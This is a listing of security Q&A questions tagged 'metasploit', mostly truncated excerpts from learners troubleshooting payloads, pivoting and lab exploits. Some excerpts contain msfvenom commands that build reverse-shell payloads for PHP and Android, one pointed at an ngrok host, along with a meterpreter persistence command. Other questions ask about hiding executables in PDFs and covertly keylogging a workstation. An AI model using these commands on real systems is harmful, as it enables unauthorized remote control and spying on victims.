Questions tagged [metasploit]

Metasploit is an open source exploitation framework that acts as a tool for developing and executing exploit code against a remote target machine

Filter by
Sorted by
Tagged with
0 votes
0 answers
22 views

Double pivoting - proxychains.conf - why should I use 2 entries?

I am studying pivoting and I had a question related to double pivoting. Reading various blogs, I read that it is a common (but not always used) practice to define two entries in the /etc/proxychains....
EEVV's user avatar
  • 1
0 votes
1 answer
32 views

Metasploit Payloads from outside the local network [duplicate]

I created a payload with metasploit and hacked my other computer. But this only works within the local network, right? I would like to know how hackers create payloads that work on targets outside the ...
Bruno Jaquinto's user avatar
0 votes
1 answer
76 views

Using Metasploit on Kali to attack a Linux machine [closed]

Whats wrong with my exploit? I'm trying to attack a Linux machine using Kali. I cannot seem to get the meterpreter session started.
Dennys Perez's user avatar
0 votes
0 answers
57 views

How to embed a PE file to another PE files

So what I want to do basically is what BDFproxy does on the go, I want to modify a file (on the disk) to embed another PE in it and have both working, it does not matter if they work concurrently or ...
LuckyCoder3607's user avatar
1 vote
1 answer
59 views

Metasploit search features returns intersection of results

When I use multiple search criteria in Metasploit it shows the results as an "or" rather than an "and". I see that this was asked several years ago so now I am wondering if this ...
osus71's user avatar
  • 13
1 vote
0 answers
287 views

exploit failed: nameerror undefined local variable or method `sysinfo' persistence service module error [closed]

Recently I have been facing an error while using Metasploit. I was trying to exploit Windows 7 with eternal-blue vulnerability. After creating a meterpreter session I was trying to maintain a ...
shinobi's user avatar
  • 11
1 vote
0 answers
107 views

Create and bind to Metasploit reverse shell on Apple Sillicon system

I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable ...
CJG's user avatar
  • 61
0 votes
1 answer
606 views

Metasploit - error msfvenom unloadable payload

I have been trying to generate a payload using msfvenom: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php I keep getting this error: "error: unloadable ...
Onuorah 's user avatar
0 votes
0 answers
77 views

Upgrade MSF ssh to meterpreter on a host behind a forwarded host

I'm training on a test network. I managed to snatch some ssh credentials and spawn a shell with msfconsole. Turns out a connection via ssh to 192.168.0.3:2222 forwards me to 192.168.0.4:22. So I have ...
Simon Huenecke's user avatar
0 votes
1 answer
117 views

Arbitrary command execution on remote devices

Is it possible to send a TCP payload to an open port that executes a specific arbitrary command on the target device using Metasploit or any other program? For example with Windows 10 Server OS? I ...
AndyCrypto's user avatar
0 votes
0 answers
64 views

Surreptitiously surveil a logged out laptop AD workstation's keyboard with temporary physical access?

I can think of multiple ways to surveil a logged out computer with temporary physical access. The first is installing a hardware keylogger which would enable one to get all the keystrokes from it; ...
Seci Pedia's user avatar
2 votes
1 answer
196 views

Does Routersploit install any malware or executables on my PC?

If I install Routersploit on my PC, would it install any malware or executable binaries as part of it to PC? Even though developers of Routersploit do not have any nefarious intention to add malware, ...
Ajay's user avatar
  • 41
0 votes
1 answer
149 views

metasploit smtp_enum: Testing different domain names

I'm testing my SMTP server using metasploit to see what information I can extract. Currently I'm trying to enumerate SMTP users using smtp_enum module. I've encountered a problem, the server ...
daneos's user avatar
  • 3
0 votes
0 answers
118 views

How to double hop pivot?

I have a networking routing problem which I am unable to find a solution for: I have a first machine, 192.168.51.103 (Windows), which is linked to subnet 172.16.51.0/24. To access this subnet, I first ...
Ankylo Gomez's user avatar
0 votes
0 answers
168 views

Is it possible to disable screenshare if someone's got meterpreter shell on your PC?

If hypothetically there was a meterpreter shell installed on your pc, are there security features or ways to harden a Windows laptop to prevent the hacker from using the screen share command to spy on ...
Rachel's user avatar
  • 1
0 votes
0 answers
64 views

Send powershell commands multiple users

My apologies if this is not the correct forum for this topic but needed to know, currently, what C2 platforms allow send commands to multiple clients at the same time. Thanks
stack_new_user's user avatar
0 votes
0 answers
160 views

Why does metasploit SSL scanner only show highest version available?

I'm trying to scan my server (Apache2 on Debian), which is configured to support only TLS1.2 (and 1.3, presumably?). The config line is: SSLProtocol all -SSLv3 -TLSv1 -TLSv1.1 I scan it with: msf6 &...
Cal-linux's user avatar
  • 123
0 votes
0 answers
18 views

How to connect OpenVAS to the Metasploit Framework [duplicate]

I want to connect OpenVAS to the Metasploit using plugin "openvas". I used load openvas in msfconsole and openvas_connect with the necessary parameters (user, password, host, port and ssl-...
Kepchyk's user avatar
2 votes
1 answer
3k views

Why does Hydra SMB attack not work while Metasploit does?

I'm learning about password attacks, and doing TryHackMe labs. User: penny Pass: leo1234 When using Hydra to find the password for the SMB user, I get no valid results: I know the valid password is ...
zeromeia's user avatar
0 votes
0 answers
1k views

APK reverse shell using ngrok is not creating a session

I am using ngrok for port forwarding (./ngrok tcp 4242) I created a payload using msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=16656 R> /var/www/html/package.apk then ...
Ambrish Katyayan's user avatar
2 votes
0 answers
206 views

Metasploit Meterpreter how to restore/create new session? [closed]

I created an apk for Android with Metasploit. Started with host ip and port and opened the "receiver terminal" A lot of things worked well when executing the apk but after some time the ...
Darkxevon's user avatar
2 votes
1 answer
588 views

Metasploit Python module: "Unknown datastore option: CMD."

In a Python Metasploit module that I'm developing, I am trying to use CMD as one of the options: 'options': { 'RHOST': {'type': 'address', 'description': 'Target address', 'required': True, '...
Aaron Meese's user avatar
2 votes
1 answer
425 views

Msfvenom reverse_tcp without LHOST

I have tested SMBGhost (CVE-2020-0796). I used the following msfvenom command to generate a reverse shell payload. msfvenom - p windows/x64/meterpreter/reverse_tcp LPORT = 4444 - b '\x00' - i 1 - f ...
HelpMe's user avatar
  • 21
0 votes
0 answers
136 views

Filter or suppress runtime errors in metasploit scans

Is there a command or options so results from metasploit scanning sessions don't print any runtime errors... With so many errors mostly due to connections being reset by peers, it is quite difficult ...
Adi D's user avatar
  • 1
0 votes
1 answer
665 views

Exploit failed: NoMethodError undefined method `smtp_send_recv' for #<Module:exploit/unix/smtp/exim4_string_format [closed]

I was trying to run an exploit using Metasploit's Exim tool. In the process I will have used the exim4_string_format module. I gave as information a RHOST, LHOSTS AND LPORT. To attack the reverse_perl ...
larasputinnieiwqgbpre's user avatar
1 vote
2 answers
950 views

How payloads provide backdoors when the victims are out of local network [duplicate]

I am a newbie in cyber security and trying to learn how payloads provide backdoors when the victims are out of the local network. I know that metasploit is a good tool for making payloads, and using ...
Not a Salmon Fish's user avatar
1 vote
0 answers
523 views

Get root permission on android for metasploit

Is there any way to get into the root file system in android with an already installed msfvenom apk in reverse_tcp (to get the whatsapp encryption key)
LWX 's user avatar
  • 11
0 votes
1 answer
188 views

What is the version of the scanned OS?

I've scanned a target with metasploit scanner/smb/smb_version and nmap -O. smb_version: Windows 2016 Standard (build:14393) Nmap: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows What is ...
quality38's user avatar
0 votes
0 answers
247 views

Converting a PE executable to a RAW format

I am on a red team exercise and want to try wePWNise to create a malware document with an executable that I have created and tested and know to pass the target's AV. Does anybody know how to convert a ...
SysRisk's user avatar
  • 11
0 votes
2 answers
3k views

Is it still possible to embed executables in PDF in 2022?

I have searched and found those posts how to embed exe file to pdf? and https://stackoverflow.com/questions/2941700/can-i-embed-an-exe-payload-in-a-pdf-doc-ppt-or-any-other-file-format, but they are ...
dovod74538's user avatar
0 votes
1 answer
210 views

Options to use for the Database Backend Command 'analyze' in msfconsole

I noticed the command analyze under Database Backend Commands in msfconsole while trying to analyze a subnet. analyze -h shows usage as such: analyze [OPTIONS] [addr1 addr2 ..] and that's it. I have ...
theone342's user avatar
0 votes
1 answer
650 views

Import a exploit into msfconsole on ubuntu

I'm attending a offensive security courses and one of the subject is import a exploit from exploitdb into msfconsole. Commonly advice that it's required to create a exploit folder inside .msf4 and ...
Gabriel Alejandro Rivas Mata's user avatar
2 votes
0 answers
1k views

Windows XP SP3 2002 is not vulnerable to MS08-067

Why is my VM not vulnerable to MS08-067? There are similar question on stack exchange, yes, but they fail to specify all relevant information and so non receive a meaningful, thoughtful nor thorough ...
HackingAndJiuJItsu's user avatar
0 votes
0 answers
505 views

Metasploit module for NULL LDAP credentials

This article covers the solution for the LDAP challenges on a capture the flag. I understand how the first example works, using the NULL value for the username and password to authenticate to the LDAP ...
questioner's user avatar
0 votes
0 answers
24 views

Can I import this exploit on metasploit or is better to use it in python? [duplicate]

I have tried to import this exploit: https://www.exploit-db.com/exploits/50539 and then use it in Metasploit (I'm following a walkthrough), but Metasploit cannot load it. Also I tried to use Python ...
Jorge Corante's user avatar
0 votes
0 answers
182 views

How do I catch metasploit session scripts error code in ruby?

I was able to start a session using metasploit framework (msf6) with an android but after a while being in the session, the meterpreter session closes. Luckily however after a few seconds, another ...
Steven Even's user avatar
0 votes
0 answers
474 views

How can I get a meterpreter session back to my attack box from subnet via pivot?

I have a lab I am dealing with and need help to get a meterpreter session on this win 7 system. My buffer overflow works great back to the pivot box. However since my attack box is not reachable from ...
Tom's user avatar
  • 101
1 vote
1 answer
4k views

Payload uploaded but error : "no session was created"

I'm doing a capture-the-flag challenge (similar to HackTheBox) and I can't figure it out despite looking at many workarounds how to solve my issue. I did: nmap --> got port 8080 firefox -> 10....
J.erome's user avatar
  • 113
1 vote
1 answer
530 views

Configure the Metasploit SSH client to support `aes256-cbc`

I am trying to set up a vulnerable machine running freeSSHd 1.2.6. The Metasploit exploit module fails with the following error: Server encryption_client preferences: aes128-cbc,3des-cbc,blowfish-cbc,...
user1720897's user avatar
0 votes
1 answer
274 views

How to find discrepancy between exploitable and unexploitable VM

For several years, I have been setting up VMs with 2-3 year old versions of Windows as well as some additional applications to demonstrate two-stage exploits using Metasploit for educational purposes (...
Andreas Unterweger's user avatar
1 vote
1 answer
10k views

Rex::BindFailed The address is already in use or unavailable

I'm trying to run the following script based on this blog. use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp setg autorunscript multi_console_command -rc /root/Desktop/folder/...
user261180's user avatar
0 votes
0 answers
600 views

Run Metasploit module against several IPs

I'm trying to run a module against several IPs. It happens that usually we can use RHOSTS file:/file.txt but in this case, that option is not available. I have tried this https://www.pentestpartners....
ampf27's user avatar
  • 3
1 vote
1 answer
855 views

Error with Metasploit when attempting to exploit netapi in Windows XP [duplicate]

I am a beginner in hacking. I have been trying to hack Windows XP using the netapi exploit in metasploit, but every time, in the end, I get an error: Exploit failed [unreachable]: Rex::...
Aakash Sharma's user avatar
0 votes
1 answer
4k views

RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)

I've been playing around with the EternalBlue exploit recently. I've downloaded a Windows 10 iso file from 2016 and used it to set up a Windows 10 Pro VM as my sandbox. I also ran the nmap script and ...
CBCH's user avatar
  • 15
0 votes
1 answer
721 views

is metasploit under whonix anonymous?

If I run an exploit like EternalBlue with Metasploit on whonix to a remote machine, do I remain anonymous? I think I do because it goes over tor but I am not sure. Am I right?
dumb guy's user avatar
0 votes
1 answer
354 views

Meterpreter: How to invoke commands in a loop for each new connection

I want to execute commands like screenshot on a regular interval (e.g. each 5min) for each incoming connection to Meterpreter using the reverse_tcp payload until the connection gets closed by the ...
muffel's user avatar
  • 103
2 votes
0 answers
852 views

Metasploit opens Meterpreter, but the shell is unresponsive [closed]

I created a payload using msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk signed the apk, sent it to my phone, opened up msfconsole and ran set payload android/...
jamessoupkitchen1234's user avatar
0 votes
0 answers
485 views

Meterpreter RPC error

How to solve this error? meterpreter > run persistence -S -i 7 -p 4444 -r 192.168.134.129 [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence. [!] Example: run exploit/...
user255470's user avatar
2 votes
2 answers
5k views

How do I set auto check to override exploit in metasploit?

I was trying to run the bolt CMS exploit. Bolt CMS 3.7.0 - Authenticated Remote Code Execution | php/webapps/48296.py (taken from searchsploit) and it wouldn't work because automatic check which ...
PsOom's user avatar
  • 21
0 votes
0 answers
215 views

How to read output of a Reflective DLL?

Reflective DLL Injection is one of the most interesting and best techniques to run custom code in memory. I've been learning about it a lot, I've learned how to pass in inputs, But I can't figure out ...
Lynx's user avatar
  • 1

1
2 3 4 5
11